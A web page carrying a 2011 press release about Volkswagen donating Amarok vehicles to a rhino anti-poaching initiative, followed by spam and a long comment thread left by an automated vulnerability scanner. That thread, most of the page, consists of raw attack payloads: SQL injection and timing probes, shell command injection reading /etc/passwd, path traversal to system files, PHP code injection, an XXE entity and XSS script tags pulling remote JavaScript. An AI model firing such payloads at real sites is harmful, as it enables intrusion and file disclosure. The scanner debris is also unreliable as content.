Petition Forever Wild - Save the Rhino Campaign

Volkswagen Amarok drives the Rhino Protection Initiative Jun 23. 2011 | Comments (798)

Volkswagen Commercial Vehicles today announced the sponsorship of six Volkswagen Amarok bakkies to the Rhino Protection Initiative at a media conference held at the Johannesburg Zoo. The R2-million sponsorship is part of the partnership between Volkswagen Commercial Vehicles and the Wilderness Foundation, the pioneers and administrators of the Forever Wild Rhino Protection Initiative.

Internationally Volkswagen has developed strategy around a responsible approach to environmental issues called ‘Think Blue’. It begins with the range of the highly efficient low emission BlueMotion cars, to energy efficient production plants and the support of appropriate environmental projects such as the Forever Wild Rhino Protection Initiative.

“Volkswagen is in the process of rolling out ‘Think Blue’ strategy in South Africa. Our current model range includes BlueMotion Touaregs, Tiguans, Golfs and Polos. Similarly, we have ground breaking initiatives at our production plant in Uitenhage and the Forever Wild Rhino Protection Initiative is the first of four environment projects we will be announcing in the next few months,” said Matt Gennrich, General Manager: Communications at Volkswagen Group South Africa.

The Amaroks were handed over to the conservation agencies in high priority areas of Mpumalanga, North West, Eastern Cape and KwaZulu Natal. The conservation agencies that will benefit from the partnership are SANPARKS, North West Parks & Tourism Board, Eastern Cape Parks & Tourism Agency, KZN Wildlife and Eastern Cape Private Game Reserves Association (Indalo). The vehicles will be primarily used in proactive rhino protection and anti-poaching activities.

Jaco Steenekamp, General Manager: Sales and Marketing at Volkswagen Commercial Vehicles, said: “Our sponsorship of the Forever Wild campaign is Volkswagen’s contribution towards the fight against the poaching and preservation of the rhino population. We are confident that the smart but tough Amarok bakkie will be an ideal partner to the conservation agencies in combating poaching activities.”

He added: “Our partnership with the Wilderness Foundation supports Volkswagen’s ‘Think Blue’ philosophy which promotes cooperation with organisations that are environmentally conscious and work towards the sustainability of endangered species.”
The latest reports show that one rhino is poached every day in South Africa. To date over 170 rhinos have been poached. To put the scale of the problem into perspective; in 2007 only 13 rhinos were poached, in 2009 the number increased to 124 and in 2010 it rocketed to 335.
In the past 40 years, South Africa has achieved unprecedented success with the preservation of the rhino population. As a result, South Africa is now home to over 90 percent of all rhinos in the world.

Dr Ian Player, the founder of the Wilderness Foundation said: “I have always been an optimist but realistic one and in the depth of my being I believe we shall succeed in saving the rhino. But do not let us be deluded, we are up against terrible dark forces that threaten to overwhelm us. In the world of wildlife conservation the White and Black rhino have been spiritual beacons of hope. All our children now look to us in our generation to ensure that the prehistoric remnants of the dinosaur age continue to exist on our Planet.”

Dr Player added: “Our first priority must be to give all the possible support to the conservation agencies and private land owners in their protection of the rhino. There is no doubt that a war is being waged and information is of critical importance, so that conservation agencies can be forewarned of where poaching is likely to occur. We have also got to look at every other alternative for the rhino survival.”
The Wilderness Foundation’s Forever Wild Initiative is concerned with maintaining populations of free ranging rhino within state and privately managed conservation areas.

The campaign supports conservation agencies and organised private game reserves to protect their rhino populations as part of functioning natural ecosystems. The campaign also aims to focus the attention of politicians and decision makers and to encourage them to apply pressure both nationally and abroad to address the issue of the illegal trade in rhino horn and other wildlife products.

“The belief by millions of people in China and Vietnam that the horn has medical properties is very deep seated and has been for thousands of years. This belief will not be changed by rational arguments. We now need to debate in all possible forums the merit and demerits of legalising the sale of rhino horn. This debate is necessary so that the Minister of the Environment can make an informed decision,” concluded Dr Player.

# how to inexpensive wow po on 3 November 2012 at 6:45:

Great post. I was checking continuously this blog and I am impressed! Extremely useful information particularly the last part :) I care for such info a lot. I was seeking this particular info for a very long time. Thank you and best of luck.
# wow gold on 3 November 2012 at 6:55:

Hello. fantastic job. I did not imagine this. This is a great story. Thanks!
# 1 on 6 November 2012 at 8:55:

1
# response.write(9306930*9900952) on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

1
# '+response.write(9306930*9900952)+' on 6 November 2012 at 15:28:

1
# &cat /etc/passwd& on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

1
# '&cat /etc/passwd&' on 6 November 2012 at 15:28:

1
# "+response.write(9306930*9900952)+" on 6 November 2012 at 15:28:

1
# -1 or 30=30 on 6 November 2012 at 15:28:

1
# "&cat /etc/passwd&" on 6 November 2012 at 15:28:

1
# SomeCustomInjectedHeader:injected_by_wvs on 6 November 2012 at 15:28:

1
# cat /etc/passwd on 6 November 2012 at 15:28:

1
# -1 or 30=0 on 6 November 2012 at 15:28:

1
# SomeCustomInjectedHeader:injected_by_wvs on 6 November 2012 at 15:28:

1
# `cat /etc/passwd` on 6 November 2012 at 15:28:

1
# -1' or '41'='41 on 6 November 2012 at 15:28:

1
# SomeCustomInjectedHeader:injected_by_wvs on 6 November 2012 at 15:28:

1
# |cat /etc/passwd# on 6 November 2012 at 15:28:

1
# -1' or '41'='0 on 6 November 2012 at 15:28:

1
# '|'ld on 6 November 2012 at 15:28:

1
# -1" or "46"="46 on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

response.write(9717118*9546646)
# "|"ld on 6 November 2012 at 15:28:

1
# -1" or "46"="0 on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

'+response.write(9717118*9546646)+'
# ;cat /etc/passwd; on 6 November 2012 at 15:28:

1
# 1 and sleep(4) on 6 November 2012 at 15:28:

1
# ';cat /etc/passwd;' on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

"+response.write(9717118*9546646)+"
# 1 on 6 November 2012 at 15:28:

SomeCustomInjectedHeader:injected_by_wvs
# 1 or (sleep(4)+1) limit 1 -- on 6 November 2012 at 15:28:

1
# ../../../../../../../../../../etc/passwd on 6 November 2012 at 15:28:

1
# ";cat /etc/passwd;" on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

SomeCustomInjectedHeader:injected_by_wvs
# ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 6 November 2012 at 15:28:

1
# 1' and sleep(4)=' on 6 November 2012 at 15:28:

1
# ||cat /etc/passwd on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

SomeCustomInjectedHeader:injected_by_wvs
# ../../../../../../../../../../etc/passwd.jpg on 6 November 2012 at 15:28:

1
# 1' and (sleep(4)+1) limit 1 -- on 6 November 2012 at 15:28:

1
# &dir on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

1
# Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n on 6 November 2012 at 15:28:

1
# 1" and sleep(4)=" on 6 November 2012 at 15:28:

1
# '&dir&' on 6 November 2012 at 15:28:

1
# 1' or (sleep(4)+1) limit 1 -- on 6 November 2012 at 15:28:

1
# ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 6 November 2012 at 15:28:

1
# "&dir&" on 6 November 2012 at 15:28:

1
# 1" or (sleep(4)+1) limit 1 -- on 6 November 2012 at 15:28:

1
# /../..//../..//../..//../..//../..//etc/passwd.jpg on 6 November 2012 at 15:28:

1
# 268435455 on 6 November 2012 at 15:28:

1
# 1'=sleep(4)=' on 6 November 2012 at 15:28:

1
# |dir on 6 November 2012 at 15:28:

1
# .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd on 6 November 2012 at 15:28:

1
# on 6 November 2012 at 15:28:

1
# 1"=sleep(4)=" on 6 November 2012 at 15:28:

1
# '|dir on 6 November 2012 at 15:28:

1
# .. on 6 November 2012 at 15:28:

1
# /etc/passwd on 6 November 2012 at 15:28:

1
# "|dir on 6 November 2012 at 15:28:

1
# 1;select pg_sleep(4); -- on 6 November 2012 at 15:28:

1
# 1e309 on 6 November 2012 at 15:28:

1
# ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd on 6 November 2012 at 15:28:

1
# '"\'\");|]*{ <> on 6 November 2012 at 15:28:

1
# ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd on 6 November 2012 at 15:28:

1
# Array on 6 November 2012 at 15:28:

1
# 1';select pg_sleep(4); -- on 6 November 2012 at 15:28:

1
# .. on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

1
# 1; waitfor delay '0:0:4' -- on 6 November 2012 at 15:28:

1
# invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././ on 6 November 2012 at 15:28:

1
# file:///etc/passwd on 6 November 2012 at 15:28:

1
# 1'; waitfor delay '0:0:4' -- on 6 November 2012 at 15:28:

1
# /\../\../\../\../\../\../\../etc/passwd on 6 November 2012 at 15:28:

1
# 1"; waitfor delay '0:0:4' -- on 6 November 2012 at 15:28:

1
# WEB-INF/web.xml on 6 November 2012 at 15:28:

1
# WEB-INF\web.xml on 6 November 2012 at 15:28:

1
# ../../../../../../../../../../windows/win.ini on 6 November 2012 at 15:28:

1
# ../../../../../../../../../../boot.ini on 6 November 2012 at 15:28:

1
# ../../../../../../../../../../windows/win.ini.jpg on 6 November 2012 at 15:28:

1
# on 6 November 2012 at 15:28:

1
# ................windowswin.ini on 6 November 2012 at 15:28:

1
# ..\..\..\..\..\..\..\..\windows\win.ini on 6 November 2012 at 15:28:

1
# /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini on 6 November 2012 at 15:28:

1
# ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini on 6 November 2012 at 15:28:

1
# ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini on 6 November 2012 at 15:28:

1
# unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

1
# WEB-INF/web.xml on 6 November 2012 at 15:28:

1
# WEB-INF\web.xml on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

268435455
# 1 on 6 November 2012 at 15:28:
# 1 on 6 November 2012 at 15:28:

..
# 1 on 6 November 2012 at 15:28:

1e309
# 1 on 6 November 2012 at 15:28:

'"\'\");|]*{
<>
# 1 on 6 November 2012 at 15:28:

Array
# ${100315+99219} on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:28:

${99278+100068}
# http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg on 6 November 2012 at 15:28:

1
# 1 on 6 November 2012 at 15:29:

1
# 1some_inexistent_file_with_long_name%00.jpg on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

1
# http://testasp.vulnweb.com/t/fit.txt?%00.jpg on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

-1 or 95=95
# testasp.vulnweb.com on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

-1 or 95=0
# 1 on 6 November 2012 at 15:29:

-1' or '53'='53
# 1 on 6 November 2012 at 15:29:

-1' or '53'='0
# 1 on 6 November 2012 at 15:29:

&cat /etc/passwd&
# 1 on 6 November 2012 at 15:29:

-1" or "108"="108
# 1 on 6 November 2012 at 15:29:

'&cat /etc/passwd&'
# 1 on 6 November 2012 at 15:29:

-1" or "108"="0
# 1 on 6 November 2012 at 15:29:

"&cat /etc/passwd&"
# 1 on 6 November 2012 at 15:29:

1 and sleep(4)
# 1 on 6 November 2012 at 15:29:

cat /etc/passwd
# 1 on 6 November 2012 at 15:29:

1 or (sleep(4)+1) limit 1 --
# 1 on 6 November 2012 at 15:29:

`cat /etc/passwd`
# 1 on 6 November 2012 at 15:29:

1' and sleep(4)='
# 1 on 6 November 2012 at 15:29:

|cat /etc/passwd#
# 1 on 6 November 2012 at 15:29:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
# 1 on 6 November 2012 at 15:29:

1' and (sleep(4)+1) limit 1 --
# 1 on 6 November 2012 at 15:29:

'|'ld
# 1 on 6 November 2012 at 15:29:

1some_inexistent_file_with_long_name%00.jpg
# 1 on 6 November 2012 at 15:29:

"|"ld
# 1 on 6 November 2012 at 15:29:

1" and sleep(4)="
# 1 on 6 November 2012 at 15:29:

http://testasp.vulnweb.com/t/fit.txt?%00.jpg
# 1 on 6 November 2012 at 15:29:

;cat /etc/passwd;
# 1 on 6 November 2012 at 15:29:

1' or (sleep(4)+1) limit 1 --
# 1 on 6 November 2012 at 15:29:

';cat /etc/passwd;'
# 1 on 6 November 2012 at 15:29:

1" or (sleep(4)+1) limit 1 --
# 1 on 6 November 2012 at 15:29:

testasp.vulnweb.com
# 1 on 6 November 2012 at 15:29:

1'=sleep(4)='
# 1&n914773=v913419 on 6 November 2012 at 15:29:

1
# ) on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

";cat /etc/passwd;"
# 1 on 6 November 2012 at 15:29:

1"=sleep(4)="
# 1 on 6 November 2012 at 15:29:

||cat /etc/passwd
# 1 on 6 November 2012 at 15:29:

1;select pg_sleep(4); --
# !(()&&!|*|*| on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

&dir
# 1 on 6 November 2012 at 15:29:

1';select pg_sleep(4); --
# ^(#$!@#$)(()))****** on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

1; waitfor delay '0:0:4' --
# 1 on 6 November 2012 at 15:29:

'&dir&'
# 1 on 6 November 2012 at 15:29:

"&dir&"
# 1 on 6 November 2012 at 15:29:

1&n975376=v948990
# 1 on 6 November 2012 at 15:29:

|dir
# 1 on 6 November 2012 at 15:29:

1'; waitfor delay '0:0:4' --
# Array on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

'|dir
# 1 on 6 November 2012 at 15:29:

1"; waitfor delay '0:0:4' --
# '"() on 6 November 2012 at 15:29:

1
# ;print(md5(acunetix_wvs_security_test)); on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

"|dir
# ';print(md5(acunetix_wvs_security_test));$a=' on 6 November 2012 at 15:29:

1
# http://testasp.vulnweb.com/t/xss.html?%00.jpg on 6 November 2012 at 15:29:

1
# ";print(md5(acunetix_wvs_security_test));$a=" on 6 November 2012 at 15:29:

1
# ${@print(md5(acunetix_wvs_security_test))} on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

http://testasp.vulnweb.com/t/xss.html?%00.jpg
# 1 on 6 November 2012 at 15:29:

)
# 1 on 6 November 2012 at 15:29:

1
# ${@print(md5(acunetix_wvs_security_test))}\ on 6 November 2012 at 15:29:

1
# acunetix_wvs_invalid_filename on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

Array
# 1 on 6 November 2012 at 15:29:

!(()&&!|*|*|
# 6443 on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

'"()
# 1 on 6 November 2012 at 15:29:

^(#$!@#$)(()))******
# 6443 on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

1
# http://testasp.vulnweb.com/t/fit.txt on 6 November 2012 at 15:29:

1
# 6443/. on 6 November 2012 at 15:29:

1
# 1'" on 6 November 2012 at 15:29:

1
# \ on 6 November 2012 at 15:29:

1
# 1Axa7A? on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

http://testasp.vulnweb.com/t/fit.txt
# @@Adnji on 6 November 2012 at 15:29:

1
# ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) on 6 November 2012 at 15:29:

1
# JyI= on 6 November 2012 at 15:29:

1
# ?'?" on 6 November 2012 at 15:29:

1
# ?''?"" on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
# //www.acunetix.tst on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

acunetix_wvs_invalid_filename
# 1 on 6 November 2012 at 15:29:

6443
# 1 on 6 November 2012 at 15:29:

6443
# 1 on 6 November 2012 at 15:29:

//www.acunetix.tst
# 1 on 6 November 2012 at 15:29:

6443/.
# <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acuneti on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

;print(md5(acunetix_wvs_security_test));
# '" on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

';print(md5(acunetix_wvs_security_test));$a='
# <!-- on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
<!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt">
]>
<xxx>&acunetixent;</xxx>
# 1 on 6 November 2012 at 15:29:

";print(md5(acunetix_wvs_security_test));$a="
# 1 on 6 November 2012 at 15:29:

../../../../../../../../../../etc/passwd
# '"()&%1<ScRiPt >prompt(916179)</ScRiPt> on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

${@print(md5(acunetix_wvs_security_test))}
# 1 on 6 November 2012 at 15:29:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
# 1 on 6 November 2012 at 15:29:

../../../../../../../../../../etc/passwd.jpg
# 1 on 6 November 2012 at 15:29:

${@print(md5(acunetix_wvs_security_test))}\
# OTU4NTQ0 on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
# 1 on 6 November 2012 at 15:29:

'"
# 1 on 6 November 2012 at 15:29:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
# 1 on 6 November 2012 at 15:29:

<!--
# 1 on 6 November 2012 at 15:29:

/../..//../..//../..//../..//../..//etc/passwd.jpg
# 1 on 6 November 2012 at 15:29:

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
# undefined1<ScRiPt >prompt(926639)</ScRiPt> on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

/etc/passwd
# 1 on 6 November 2012 at 15:29:

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
# 1 on 6 November 2012 at 15:29:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
# 1<ScRiPt >prompt(975560)</ScRiPt> on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

..
# 1 on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

1'"
# 1 on 6 November 2012 at 15:29:

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
# 1 on 6 November 2012 at 15:29:

\
# 1 on 6 November 2012 at 15:29:

file:///etc/passwd
# 1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958622></ScRiPt> on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

1Axa7A?
# 1 on 6 November 2012 at 15:29:

/\../\../\../\../\../\../\../etc/passwd
# 1 on 6 November 2012 at 15:29:

@@I09jP
# 1 on 6 November 2012 at 15:29:

WEB-INF/web.xml
# 1 on 6 November 2012 at 15:29:

JyI=
# 1 on 6 November 2012 at 15:29:

WEB-INF\web.xml
# 1 on 6 November 2012 at 15:29:

?'?"
# 1 on 6 November 2012 at 15:29:

../../../../../../../../../../windows/win.ini
# 1 on 6 November 2012 at 15:29:

?''?""
# 1 on 6 November 2012 at 15:29:

../../../../../../../../../../boot.ini
# 1<ScRiPt >prompt(911149)</ScRiPt> on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

../../../../../../../../../../windows/win.ini.jpg
# 1 on 6 November 2012 at 15:29:
# 1 on 6 November 2012 at 15:29:

................windowswin.ini
# 1 on 6 November 2012 at 15:29:

..\..\..\..\..\..\..\..\windows\win.ini
# <video><source onerror="javascript:prompt(901304)"> on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
# 1 on 6 November 2012 at 15:29:

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
# 1 on 6 November 2012 at 15:29:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
# 1 on 6 November 2012 at 15:29:

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\